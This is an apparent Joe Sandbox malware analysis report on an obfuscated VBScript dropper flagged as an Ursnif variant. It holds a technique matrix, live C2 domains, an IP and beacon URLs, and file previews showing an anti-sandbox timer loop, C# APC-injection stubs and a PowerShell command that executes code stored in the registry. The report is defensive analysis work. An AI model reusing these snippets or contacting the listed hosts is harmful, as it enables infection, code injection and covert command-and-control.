            Local AccountsExploitation for Client Execution1Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSSystem Information Discovery56Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCommand and Scripting Interpreter1Network Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaPowerShell1Rc.commonRc.commonRootkit4Cached Domain CredentialsSecurity Software Discovery24VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading11DCSyncVirtualization/Sandbox Evasion41Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobModify Registry1Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion41/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection112Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRundll321Input CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 458149 Sample: v8MaHZpVOY2L.vbs Startdate: 02/08/2021 Architecture: WINDOWS Score: 100 35 app.flashgameo.at 2->35 37 resolver1.opendns.com 2->37 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Multi AV Scanner detection for domain / URL 2->45 47 Found malware configuration 2->47 49 13 other signatures 2->49 8 wscript.exe 2 2->8         started        12 WmiPrvSE.exe 2->12         started        14 mshta.exe 19 2->14         started        16 2 other processes 2->16 signatures3 process4 file5 33 C:\Users\user\AppData\...\beneficial.odt, PE32 8->33 dropped 55 Benign windows process drops PE files 8->55 57 VBScript performs obfuscated calls to suspicious functions 8->57 59 Deletes itself after installation 8->59 61 Creates processes via WMI 8->61 18 rundll32.exe 12->18         started        63 Suspicious powershell command line found 14->63 20 powershell.exe 24 14->20         started        signatures6 process7 file8 23 rundll32.exe 18->23         started        31 C:\Users\user\AppData\...\xbktblub.cmdline, UTF-8 20->31 dropped 27 csc.exe 1 20->27         started        29 conhost.exe 20->29         started        process9 dnsIp10 39 app.flashgameo.at 185.228.233.17, 49744, 49745, 49746 ITOS-ASRU Russian Federation 23->39 41 gtr.antoinfer.com 23->41 51 System process connects to network (likely due to code injection or exploit) 23->51 53 Writes registry values via WMI 23->53 signatures11

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            v8MaHZpVOY2L.vbs34%VirustotalBrowse
            v8MaHZpVOY2L.vbs13%ReversingLabsScript-WScript.Trojan.Heuristic

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\beneficial.odt14%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\beneficial.odt36%ReversingLabsWin32.Trojan.Wacatac

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            28.2.rundll32.exe.4440000.4.unpack100%AviraHEUR/AGEN.1108168Download File

            Domains

            SourceDetectionScannerLabelLink
            gtr.antoinfer.com12%VirustotalBrowse
            app.flashgameo.at11%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://gtr.antoinfer.com/rlxVSKuL/2_2BsetYpYqkPa4ojd3ueIs/LptIHuoMYe/oePXHReeS37D5yQcj/NVMKXI44Lp_2/FBXX9_2Bb20/jKEI_2Bgs2rJZa/uDvTh6TWLh5vgJvzY3DD5/t9e4NaZqHQBjkiny/8qc8N7JBB_2BWAp/j62HsMJoXm5nFzMKnH/PUlPiGqu_/2BwmGwUAtbFIfQPHyxkA/s1QKb9NHLGrKFNlhNvS/ugnsSzKyJjdaSAXMmE7nnq/w4loggPNqDjSA/3u_2Fu4X/o8m8kFpFCtqZfzxEWO6Thbv/o4OD2d7LJV/azLj6lFTEoSfLl1Au/Hx1vAUoJagaa/8_2Faxj3Ge9/KUQqi9K100%Avira URL Cloudmalware
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            http://app.flashgameo.at/G_2BtrdeOa30tm0G9t89_/2B2JiDdQSL9x3Q_2/FX260sNBDITgyeI/BpdcrPIFomZZkoPh3u/AGrnxiUWf/rTd4z_2FOnqpP22ZfzjV/mxG1oweqZWhdtbLmZAx/FWCeM7DpHnLSREoZzBO0OT/Gl1f2t9tfS_2B/ptWI3fqD/FvNQq67awVJw_2B1kVzh8_2/BYbRBRJlE6/co1z79C1RuybQlL62/8psEOCbjHHAG/PdRgwv9Npt6/R_2FEA3He8vvaK/f3TQbAUz8vl1HZbrGMu9B/8naEcnAAoMKIKsYO/rVxHWtDfSOnGKso/2ZAFkBCgt5yBJA/G100%Avira URL Cloudmalware
            https://contoso.com/Icon0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            gtr.antoinfer.com
            185.228.233.17
            truetrueunknown
            resolver1.opendns.com
            208.67.222.222
            truefalse
              high
              app.flashgameo.at
              185.228.233.17
              truetrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://gtr.antoinfer.com/rlxVSKuL/2_2BsetYpYqkPa4ojd3ueIs/LptIHuoMYe/oePXHReeS37D5yQcj/NVMKXI44Lp_2/FBXX9_2Bb20/jKEI_2Bgs2rJZa/uDvTh6TWLh5vgJvzY3DD5/t9e4NaZqHQBjkiny/8qc8N7JBB_2BWAp/j62HsMJoXm5nFzMKnH/PUlPiGqu_/2BwmGwUAtbFIfQPHyxkA/s1QKb9NHLGrKFNlhNvS/ugnsSzKyJjdaSAXMmE7nnq/w4loggPNqDjSA/3u_2Fu4X/o8m8kFpFCtqZfzxEWO6Thbv/o4OD2d7LJV/azLj6lFTEoSfLl1Au/Hx1vAUoJagaa/8_2Faxj3Ge9/KUQqi9Ktrue
              • Avira URL Cloud: malware
              unknown
              http://app.flashgameo.at/G_2BtrdeOa30tm0G9t89_/2B2JiDdQSL9x3Q_2/FX260sNBDITgyeI/BpdcrPIFomZZkoPh3u/AGrnxiUWf/rTd4z_2FOnqpP22ZfzjV/mxG1oweqZWhdtbLmZAx/FWCeM7DpHnLSREoZzBO0OT/Gl1f2t9tfS_2B/ptWI3fqD/FvNQq67awVJw_2B1kVzh8_2/BYbRBRJlE6/co1z79C1RuybQlL62/8psEOCbjHHAG/PdRgwv9Npt6/R_2FEA3He8vvaK/f3TQbAUz8vl1HZbrGMu9B/8naEcnAAoMKIKsYO/rVxHWtDfSOnGKso/2ZAFkBCgt5yBJA/Gtrue
              • Avira URL Cloud: malware
              unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmpfalse
                high
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000025.00000002.734794410.000001D6820CF000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000025.00000002.732660461.000001D681EC1000.00000004.00000001.sdmpfalse
                  high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000025.00000002.734794410.000001D6820CF000.00000004.00000001.sdmpfalse
                    high
                    https://github.com/Pester/Pesterpowershell.exe, 00000025.00000002.734794410.000001D6820CF000.00000004.00000001.sdmpfalse
                      high
                      https://contoso.com/powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmpfalse
                        high
                        https://contoso.com/Licensepowershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://contoso.com/Iconpowershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        185.228.233.17
                        gtr.antoinfer.comRussian Federation
                        64439ITOS-ASRUtrue

                        General Information

                        Joe Sandbox Version:33.0.0 White Diamond
                        Analysis ID:458149
                        Start date:02.08.2021
                        Start time:22:02:07
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 9m 11s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:v8MaHZpVOY2L.vbs
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:40
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winVBS@14/8@6/1
                        EGA Information:
                        • Successful, ratio: 50%
                        HDC Information:
                        • Successful, ratio: 15.6% (good quality ratio 14.9%)
                        • Quality average: 80.8%
                        • Quality standard deviation: 27.7%
                        HCA Information:
                        • Successful, ratio: 71%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .vbs
                        • Override analysis time to 240s for JS/VBS files not yet terminated
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 104.43.193.48, 23.211.6.115, 13.64.90.137, 20.82.210.154, 23.35.236.56, 40.112.88.60, 173.222.108.226, 173.222.108.210, 80.67.82.235, 80.67.82.211, 20.54.110.249
                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                        • Execution Graph export aborted for target mshta.exe, PID 5200 because there are no executed function
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        22:05:38API Interceptor1x Sleep call for process: wscript.exe modified
                        22:06:42API Interceptor3x Sleep call for process: rundll32.exe modified
                        22:06:54API Interceptor42x Sleep call for process: powershell.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        185.228.233.17beneficial.dllGet hashmaliciousBrowse
                          mental.dllGet hashmaliciousBrowse

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            resolver1.opendns.combeneficial.dllGet hashmaliciousBrowse
                            • 208.67.222.222
                            2790000.dllGet hashmaliciousBrowse
                            • 208.67.222.222
                            2770174.dllGet hashmaliciousBrowse
                            • 208.67.222.222
                            3a94.dllGet hashmaliciousBrowse
                            • 208.67.222.222
                            laka4.dllGet hashmaliciousBrowse
                            • 208.67.222.222
                            o0AX0nKiUn.dllGet hashmaliciousBrowse
                            • 208.67.222.222
                            a.exeGet hashmaliciousBrowse
                            • 208.67.222.222
                            swlsGbeQwT.dllGet hashmaliciousBrowse
                            • 208.67.222.222
                            document-1048628209.xlsGet hashmaliciousBrowse
                            • 208.67.222.222
                            document-69564892.xlsGet hashmaliciousBrowse
                            • 208.67.222.222
                            document-1813856412.xlsGet hashmaliciousBrowse
                            • 208.67.222.222
                            document-1776123548.xlsGet hashmaliciousBrowse
                            • 208.67.222.222
                            document-647734423.xlsGet hashmaliciousBrowse
                            • 208.67.222.222
                            document-1579869720.xlsGet hashmaliciousBrowse
                            • 208.67.222.222
                            document-895003104.xlsGet hashmaliciousBrowse
                            • 208.67.222.222
                            document-806281169.xlsGet hashmaliciousBrowse
                            • 208.67.222.222
                            document-1747349663.xlsGet hashmaliciousBrowse
                            • 208.67.222.222
                            document-1822768538.xlsGet hashmaliciousBrowse
                            • 208.67.222.222
                            document-583955381.xlsGet hashmaliciousBrowse
                            • 208.67.222.222
                            document-1312908141.xlsGet hashmaliciousBrowse
                            • 208.67.222.222
                            app.flashgameo.atbeneficial.dllGet hashmaliciousBrowse
                            • 185.228.233.17
                            gtr.antoinfer.combeneficial.dllGet hashmaliciousBrowse
                            • 185.228.233.17
                            mental.dllGet hashmaliciousBrowse
                            • 185.228.233.17
                            lj3H69Z3Io.dllGet hashmaliciousBrowse
                            • 167.172.38.18
                            SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dllGet hashmaliciousBrowse
                            • 165.232.183.49
                            documentation_39236.xlsbGet hashmaliciousBrowse
                            • 165.232.183.49
                            3a94.dllGet hashmaliciousBrowse
                            • 165.232.183.49
                            3b17.dllGet hashmaliciousBrowse
                            • 165.232.183.49
                            9b9dc.dllGet hashmaliciousBrowse
                            • 165.232.183.49

                            ASN

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            ITOS-ASRUbeneficial.dllGet hashmaliciousBrowse
                            • 185.228.233.17
                            mental.dllGet hashmaliciousBrowse
                            • 185.228.233.17
                            1n0JwffkPt.exeGet hashmaliciousBrowse
                            • 185.228.233.5
                            niaSOf2RtX.exeGet hashmaliciousBrowse
                            • 193.187.173.42
                            ao9sQznMcA.exeGet hashmaliciousBrowse
                            • 193.187.175.114
                            k87DGeHNZD.exeGet hashmaliciousBrowse
                            • 193.187.175.114
                            iiLllZALpo.exeGet hashmaliciousBrowse
                            • 193.187.175.114
                            E6o11ym5Sz.exeGet hashmaliciousBrowse
                            • 193.187.175.114
                            Oo0Djz1juc.exeGet hashmaliciousBrowse
                            • 193.187.175.114
                            JeqzgYmPWu.exeGet hashmaliciousBrowse
                            • 193.187.175.114
                            HBkYcWWHmy.exeGet hashmaliciousBrowse
                            • 185.159.129.78
                            report.11.20.docGet hashmaliciousBrowse
                            • 193.187.175.31
                            intelligence_11.20.docGet hashmaliciousBrowse
                            • 193.187.175.31
                            details-11.20.docGet hashmaliciousBrowse
                            • 193.187.175.31
                            deed contract_11.04.2020.docGet hashmaliciousBrowse
                            • 193.187.175.31
                            direct 11.20.docGet hashmaliciousBrowse
                            • 193.187.175.31
                            direct 11.20.docGet hashmaliciousBrowse
                            • 193.187.175.31
                            direct 11.20.docGet hashmaliciousBrowse
                            • 193.187.175.31
                            question 11.04.2020.docGet hashmaliciousBrowse
                            • 193.187.175.31
                            question 11.04.2020.docGet hashmaliciousBrowse
                            • 193.187.175.31

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2d5wfsji.ow5.ps1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview: 1
                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_slzfxbde.xn1.psm1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview: 1
                            C:\Users\user\AppData\Local\Temp\adobe.url
                            Process:C:\Windows\System32\wscript.exe
                            File Type:MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):108
                            Entropy (8bit):4.699454908123665
                            Encrypted:false
                            SSDEEP:3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
                            MD5:99D9EE4F5137B94435D9BF49726E3D7B
                            SHA1:4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
                            SHA-256:F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
                            SHA-512:7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
                            Malicious:false
                            Preview: [{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..
                            C:\Users\user\AppData\Local\Temp\beneficial.odt
                            Process:C:\Windows\System32\wscript.exe
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):658944
                            Entropy (8bit):6.487765620200357
                            Encrypted:false
                            SSDEEP:12288:HMUpikM1ABVY4lsBnllWzwazxRvwa9QKC71L715+PoR5nFIlW2i:K4Y4lglQzwyxRvwuSJLT5FIV
                            MD5:A4EEA92CBA350C769021968E0C3D73AF
                            SHA1:3BF09EBFD34210A55E73985A41BE2A41822F05A7
                            SHA-256:41E8BCE42BC1A7AAA24F3747015454C9A9886DEFF8474B9F055176FD0CE299A9
                            SHA-512:D4B2E9649CD2C842B158750C6DA2C3004F8BE4C065898EA0FF522D2028997058CA5129B361841BC827F7ED7F61D5F8ACFE890BE9A927EDDD7E4E62D537B226AA
                            Malicious:true
                            Antivirus:
                            • Antivirus: Metadefender, Detection: 14%, Browse
                            • Antivirus: ReversingLabs, Detection: 36%
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................................................................................................Rich...........................PE..L.....hJ...........!.....|...v....................@..........................0............@.........................p...h.......x..................................................................(...@...............h............................text...!{.......|.................. ..`.rdata... ......."..................@..@.data...............................@....rsrc...............................@..@.reloc...N.......P..................@..B........................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.0.cs
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text
                            Category:dropped
                            Size (bytes):398
                            Entropy (8bit):4.993655904789625
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuJWLPMRSR7a1MIq+ZXIO1SRa+rVSSRnA/fHJGF0y:V/DTLDfu0LnQs9rV5nA/Ra0y
                            MD5:C08AF9BD048D4864677C506B609F368E
                            SHA1:23B8F42A01326DC612E4205B08115A4B68677045
                            SHA-256:EA46497ADAE53B5568188564F92E763040A350603555D9AA5AE9A371192D7AE7
                            SHA-512:9688FD347C664335C40C98A3F0F8D8AF75ABA212A75908A96168D3AEBFC2FEAAB25DD62B63233EB70066DD7F8FB297F422871153901142DB6ECD83D1D345E3C2
                            Malicious:false
                            Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class stkml. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr xwiefclj,IntPtr fqsexnr,IntPtr ormij);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint llcs,uint flwnybjk,IntPtr coa);.. }..}.
                            C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):369
                            Entropy (8bit):5.25585801040946
                            Encrypted:false
                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f820zxs7+AEszIWXp+N23f8U:p37Lvkmb6KH0pWZE80U
                            MD5:52C86D47C84D7CA51507F7D9C3E1BAEE
                            SHA1:91D1EFA87D53E0455907538CFCFA3D19B8BDEBF1
                            SHA-256:46228A9548CD6F40AC36C067D553064A015E22989517CF8E8AC50525D641ECEE
                            SHA-512:B6F0BA284E26FD84C245EBC99F193B7AFF4710251F3FCEDBA60C81391DB2F5DF267B1B596B8987B62983AC8FE2B7B2810F4270157F02DE1384CD424F7E0B2D33
                            Malicious:true
                            Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.0.cs"
                            C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.out
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                            Category:modified
                            Size (bytes):454
                            Entropy (8bit):5.384411204566502
                            Encrypted:false
                            SSDEEP:6:IM7mLAA9VwRhMuAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f820zxs7+AEszIWM:xKIR37Lvkmb6KH0pWZE801
                            MD5:D9C3637C36241BF406342EC2CDEC659C
                            SHA1:8580B3BADD4EB4202357A2060AA597C1C8785870
                            SHA-256:8359448DF79858FF6283E4AEE20B53C2822C6D199A226AC689B7A7E79FC979BA
                            SHA-512:2FDDC3328A7A69AFC4B26ADDE5715AD8BE4E70B9A3D4D97A05D1A3A4306C33C84EC4A1523111EEB186A900B4A99D72AF7ABE6256E2DADF029C5FDAD18CB94E5B
                            Malicious:false
                            Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.0.cs"......
                            C:\Users\user\Documents\20210802\PowerShell_transcript.841618.nGLqID_F.20210802220653.txt
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):976
                            Entropy (8bit):5.485955435920702
                            Encrypted:false
                            SSDEEP:24:BxSA5xvBn8x2DOXUWOLCHGIYBtBCWIHjeTKKjX4CIym1ZJXDOLCHGIYBtBW:BZLvh8oORFeVIqDYB1ZHFeW
                            MD5:59448F6C09AD60F77A788FA6C06525EB
                            SHA1:4F2250993ACF7153C117A3CC9AB75AA621CFF3DF
                            SHA-256:B7498809E43C5ECD53766AC890D9354B170635C9F5B6FB7F69860C6F62010F35
                            SHA-512:69FE9D3D95C5F2B90A3BEA67C57D18522E2F220B757E8F58AD2876721849A83D268F6E1EAADE6AC2D5B5BB5101473263DF16A48B737A39C1767989C77F18C765
                            Malicious:false
                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20210802220653..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841618 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 4260..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210802220653..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..

                            Static File Info

                            General

                            File type:ASCII text, with very long lines, with CRLF line terminators
                            Entropy (8bit):4.778621513609206
                            TrID:
                              File name:v8MaHZpVOY2L.vbs
                              File size:2145907
                              MD5:5d6eee678e2f66bef8885b3b3064db81
                              SHA1:4f64fdc2929e29ad8c001a0c3d8ad02f175f68d8
                              SHA256:9889b06c39eab474b06205ab27007447ee6e7eebdb8ac2e55b31eaacdcde8a49
                              SHA512:6dc679a8c71f13b394558c19e95dbd8ab6c6f94063ec7871a5b2a615df5d72a3f9436c0c5d08814c2f90f4d9eb64723ff40e783aa6561165eb392a7a2eca5e18
                              SSDEEP:24576:XXPk3DlGCTdgAY8BoiPwebRSbzQUOJ0HnGc7KALe2yYR:XMIHQaoIR
                              File Content Preview:UISA = Timer()..For Ysdhh = 1 to 7..WScript.Sleep 1000:..Next..ASDQWE = Timer()..if ASDQWE - UISA < 5 Then..Do: Asrtd = 4: Loop..End if..BjFe = Array(Ww263,yQ,GI,6,9,6,6,6,10,6,6,6,Ki,Ki,6,6,we,6,6,6,6,6,6,6,yE,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,

                              File Icon

                              Icon Hash:e8d69ece869a9ec4

                              Network Behavior

                              Snort IDS Alerts

                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                              08/02/21-22:06:41.591709TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4974480192.168.2.3185.228.233.17
                              08/02/21-22:06:43.038396TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4974580192.168.2.3185.228.233.17
                              08/02/21-22:06:43.038396TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4974580192.168.2.3185.228.233.17
                              08/02/21-22:06:44.399979TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4974680192.168.2.3185.228.233.17
                              08/02/21-22:06:44.399979TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4974680192.168.2.3185.228.233.17
